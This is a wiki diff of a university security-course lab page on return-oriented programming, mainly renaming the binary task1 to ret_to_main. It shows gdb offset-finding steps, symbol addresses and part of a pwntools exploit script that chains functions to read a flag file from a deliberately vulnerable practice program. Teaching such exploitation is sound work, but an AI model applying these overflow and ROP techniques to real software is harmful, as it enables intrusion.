Differences

This shows you the differences between two versions of the page.

Link to this comparison view

cns:labs:lab-09 [2020/12/14 16:39]
mihai.dumitru2201 [Supporting files]
cns:labs:lab-09 [2022/12/05 13:36] (current)
mihai.dumitru2201 [Tasks]
Line 1: Line 1:
-====== Lab 09 - Return Oriented Programming (Part 2) ====== +====== Lab 09 - Return-Oriented Programming (Part 2) ======
- +
-===== Resources ===== +
- +
-  * [[http://​neilscomputerblog.blogspot.ro/​2012/​06/​stack-pivoting.html|More about stack pivoting and creating a "fake stack"​]] +
  
 ===== Introduction ===== ===== Introduction =====
Line 34: Line 29:
  
 ===== Tasks ===== ===== Tasks =====
 +
 +All content necessary for the CNS laboratory tasks can be found in [[cns:​resources:​repo|the CNS public repository]]. ​
 +
 +
  
 ==== 1. Return to main ==== ==== 1. Return to main ====
  
-Inspect the source file ''​task1.c''​. See if you can spot the vulnerability.+Inspect the source file ''​ret_to_main.c''​. See if you can spot the vulnerability.
  
 The goal of the task is to get the contents of the ''​flag''​ file through the binary. In order to do this, we need to chain three functions together. The goal of the task is to get the contents of the ''​flag''​ file through the binary. In order to do this, we need to chain three functions together.
Line 44: Line 43:
  
 <code asm> <code asm>
-# gdb ./task1+# gdb ./ret_to_main
 gdb-peda$ pattc 0x40 gdb-peda$ pattc 0x40
 '​AAA%AAsAABAA$AAnAACAA-AA(AADAA;​AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH'​ '​AAA%AAsAABAA$AAnAACAA-AA(AADAA;​AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH'​
 gdb-peda$ r gdb-peda$ r
-Starting program: /​cns/​lab-11/​sol/​task1+Starting program: /​cns/​lab-11/​sol/​ret_to_main
 Welcome to our Retired Old Programmers message board! Welcome to our Retired Old Programmers message board!
 Please leave a message: Please leave a message:
Line 100: Line 99:
 </​code>​ </​code>​
  
-Our $rbp is at offset 48  => the return address will be at offset 56.+Our ''​$rbp'' ​is at offset 48  => the return address will be at offset 56.
  
 === Tutorial: Opening the flag file and returning to main === === Tutorial: Opening the flag file and returning to main ===
Line 112: Line 111:
 We'll need to save a few useful addresses: We'll need to save a few useful addresses:
 <code bash> <code bash>
-# nm task1 | egrep "​main|stop|right|there|play"​+# nm ret_to_main ​| egrep "​main|stop|right|there|play"​
                 ​                 ​
 00000000004012b5 T main 00000000004012b5 T main
Line 128: Line 127:
 from pwn import * from pwn import *
  
-io = process('​./​task1')+io = process('​./​ret_to_main')
  
 # Useful values # Useful values
Line 158: Line 157:
 <code bash> <code bash>
 # ./​test.py ​ # ./​test.py ​
-[+] Starting local process './task1': Done+[+] Starting local process './ret_to_main': Done
 [*] Switching to interactive mode [*] Switching to interactive mode
 -> secret vault opened -> secret vault opened
Line 164: Line 163:
 Please leave a message: ​ Please leave a message: ​
  
-[*] Stopped program './task1'+[*] Stopped program './ret_to_main'
 </​code>​ </​code>​
  
Line 323: Line 322:
 Now you are set to write a fully working ropchain to sequentially call the three functions in order to open, read and print the contents of the flag file. Now you are set to write a fully working ropchain to sequentially call the three functions in order to open, read and print the contents of the flag file.
  
 +===== Resources =====
 +
 +  * [[http://​neilscomputerblog.blogspot.ro/​2012/​06/​stack-pivoting.html|More about stack pivoting and creating a "fake stack"​]]
cns/labs/lab-09.1607956755.txt.gz · Last modified: 2020/12/14 16:39 by mihai.dumitru2201
CC Attribution-Share Alike 3.0 Unported
www.chimeric.de Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0